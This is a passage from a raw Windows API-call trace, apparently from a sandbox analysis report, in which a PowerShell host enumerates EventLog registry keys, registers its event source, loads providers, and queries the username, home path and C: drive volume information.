samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.076] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x370) returned 0x0 [0079.076] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.077] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x5 [0079.085] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x374) returned 0x0 [0079.085] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.086] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x378) returned 0x0 [0079.086] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x37c) returned 0x0 [0079.086] RegCloseKey (hKey=0x37c) returned 0x0 [0079.086] RegCloseKey (hKey=0x314) returned 0x0 [0079.087] RegCloseKey (hKey=0x378) returned 0x0 [0079.087] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce29c | out: phkResult=0xce29c*=0x378) returned 0x0 [0079.087] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce304, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce300, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce304*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce300*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.088] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.088] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.088] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.089] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.089] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.089] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.089] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.090] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.090] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x2d1690, lpcchName=0xce320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xce320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.090] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x314) returned 0x0 [0079.091] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.091] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x37c) returned 0x0 [0079.091] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.091] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x380) returned 0x0 [0079.092] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.092] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x384) returned 0x0 [0079.092] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.093] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x388) returned 0x0 [0079.093] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.093] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x38c) returned 0x0 [0079.094] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.094] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x5 [0079.103] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x390) returned 0x0 [0079.104] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x0) returned 0x2 [0079.104] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x394) returned 0x0 [0079.104] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2cc | out: phkResult=0xce2cc*=0x398) returned 0x0 [0079.105] RegCloseKey (hKey=0x398) returned 0x0 [0079.105] RegCloseKey (hKey=0x378) returned 0x0 [0079.105] RegCloseKey (hKey=0x394) returned 0x0 [0079.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xce290 | out: phkResult=0xce290*=0x394) returned 0x0 [0079.105] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xce2f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce2f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xce2f8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xce2f4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.106] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.107] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x2d1690, lpcchName=0xce314, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xce314, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.107] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x378) returned 0x0 [0079.107] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.107] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x398) returned 0x0 [0079.107] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.107] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x39c) returned 0x0 [0079.108] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.108] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x3a0) returned 0x0 [0079.108] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.108] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x3a4) returned 0x0 [0079.109] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.109] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x3a8) returned 0x0 [0079.109] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.109] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x5 [0079.115] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x3ac) returned 0x0 [0079.115] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x0) returned 0x2 [0079.115] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x3b0) returned 0x0 [0079.116] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xce2c0 | out: phkResult=0xce2c0*=0x3b4) returned 0x0 [0079.116] RegCloseKey (hKey=0x3b4) returned 0x0 [0079.116] RegCloseKey (hKey=0x394) returned 0x0 [0079.116] RegCloseKey (hKey=0x3b0) returned 0x0 [0079.119] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4eb0004 [0079.122] GetLastError () returned 0x0 [0079.123] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3203cd8*="WSMan", lpRawData=0x3203b80) returned 1 [0079.129] GetLastError () returned 0x0 [0079.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.131] GetLastError () returned 0xcb [0079.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.131] GetLastError () returned 0xcb [0079.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.132] GetLastError () returned 0xcb [0079.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.132] GetLastError () returned 0xcb [0079.132] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0079.132] GetLastError () returned 0xcb [0079.133] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.133] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3207b90*="Alias", lpRawData=0x3207a4c) returned 1 [0079.134] GetLastError () returned 0x0 [0079.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.135] GetLastError () returned 0xcb [0079.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.136] GetLastError () returned 0xcb [0079.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.136] GetLastError () returned 0xcb [0079.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.136] GetLastError () returned 0xcb [0079.136] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0079.137] GetLastError () returned 0xcb [0079.137] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.139] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x320bb00*="Environment", lpRawData=0x320b9bc) returned 1 [0079.139] GetLastError () returned 0x0 [0079.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.140] GetLastError () returned 0xcb [0079.141] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0079.141] GetLastError () returned 0xcb [0079.141] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="\\Users\\hJrD1KOKY DS8lUjv") returned 0x18 [0079.141] GetLastError () returned 0xcb [0079.142] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcdf64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.142] GetLastError () returned 0xcb [0079.142] SetErrorMode (uMode=0x1) returned 0x1 [0079.142] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", fInfoLevelId=0x0, lpFileInformation=0xce3e4 | out: lpFileInformation=0xce3e4) returned 1 [0079.142] GetLastError () returned 0xcb [0079.142] SetErrorMode (uMode=0x1) returned 0x1 [0079.159] GetLogicalDrives () returned 0x4 [0079.159] GetLastError () returned 0xcb [0079.161] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcde88, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.161] GetLastError () returned 0xcb [0079.163] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.163] GetLastError () returned 0xcb [0079.163] SetErrorMode (uMode=0x1) returned 0x1 [0079.166] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2d1790, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xce3b0, lpMaximumComponentLength=0xce3ac, lpFileSystemFlags=0xce3a8, lpFileSystemNameBuffer=0x2d1690, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xce3b0*=0x28e290c4, lpMaximumComponentLength=0xce3ac*=0xff, lpFileSystemFlags=0xce3a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.166] GetLastError () returned 0xcb [0079.167] SetErrorMode (uMode=0x1) returned 0x1 [0079.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.167] GetLastError () returned 0xcb [0079.167] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcdf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.167] GetLastError () returned 0xcb [0079.167] SetErrorMode (uMode=0x1) returned 0x1 [0079.167] GetFileAttributesExW (in: lpFileName="C:\\", fInfoLevelId=0x0, lpFileInformation=0x320cd2c | out: lpFileInformation=0x320cd2c) returned 1 [0079.167] GetLastError () returned 0xcb [0079.167] SetErrorMode (uMode=0x1) returned 0x1 [0079.167] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcdf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.167] GetLastError () returned 0xcb [0079.168] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcde9c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.168] GetLastError () returned 0xcb [0079.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.168] GetLastError () returned 0xcb [0079.170] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcde58, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.170] GetLastError () returned 0xcb [0079.171] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0079.171] GetLastError () returned 0xcb [0079.172] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcde60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.172] GetLastError () returned 0xcb [0079.172] SetErrorMode (uMode=0x1) returned 0x1 [0079.172] GetFileAttributesExW (in: lpFileName="C:\\", fInfoLevelId=0x0, lpFileInformation=0x320d984 | out: lpFileInformation=0x320d984) returned 1 [0079.172] GetLastError () returned 0xcb [0079.172] SetErrorMode (uMode=0x1) returned 0x1 [0079.173] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcde68, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.173] GetLastError () returned 0xcb [0079.173] SetErrorMode (uMode=0x1) returned 0x1 [0079.173] GetFileAttributesExW (in: lpFileName="C:\\", fInfoLevelId=0x0, lpFileInformation=0x320dad4 | out: lpFileInformation=0x320dad4) returned 1 [0079.173] GetLastError () returned 0xcb [0079.173] SetErrorMode (uMode=0x1) returned 0x1 [0079.173] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcdeac, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0079.173] GetLastError () returned 0xcb [0079.173] SetErrorMode (uMode=0x1) returned 0x1 [0079.173] GetFileAttributesExW (in: lpFileName="C:\\", fInfoLevelId=0x0, lpFileInformation=0x320dc74 | out: lpFileInformation=0x320dc74) returned 1 [0079.174] GetLastError () returned 0xcb [0079.174] SetErrorMode (uMode=0x1) returned 0x1 [0079.174] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0079.175] GetLastError () returned 0xcb [0079.175] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.176] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32109d8*="FileSystem", lpRawData=0x3210894) returned 1 [0079.176] GetLastError () returned 0x0 [0079.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.178] GetLastError () returned 0xcb [0079.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.179] GetLastError () returned 0xcb [0079.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.179] GetLastError () returned 0xcb [0079.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.179] GetLastError () returned 0xcb [0079.180] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", 